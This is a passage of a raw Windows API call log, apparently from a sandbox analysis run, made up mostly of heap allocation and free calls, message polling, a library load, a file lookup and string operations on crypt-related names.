Size=0x20) returned 0x2e54440 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0139.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0139.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0139.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.656] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0139.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0139.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0139.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.657] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/cggtx8L.gif", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51db5a40, ftCreationTime.dwHighDateTime=0x1d5e82d, ftLastAccessTime.dwLowDateTime=0x3f99d420, ftLastAccessTime.dwHighDateTime=0x1d5eea8, ftLastWriteTime.dwLowDateTime=0x3f99d420, ftLastWriteTime.dwHighDateTime=0x1d5eea8, nFileSizeHigh=0x0, nFileSizeLow=0x2a7d, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="cggtx8L.gif", cAlternateFileName="")) returned 0xa87290 [0139.658] FindClose (in: hFindFile=0xa87290 | out: hFindFile=0xa87290) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0139.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.658] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0139.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0139.659] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0139.659] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0139.659] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0139.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0139.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0139.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0139.660] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0139.660] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0139.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0139.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0139.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.661] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0139.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0139.662] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0139.662] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0139.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0139.663] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.663] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0139.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0139.682] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0139.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.683] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0139.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0139.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0139.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.684] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0139.684] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0139.684] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0139.684] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0139.685] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0139.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0139.685] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0139.688] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0139.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.689] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0139.689] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: 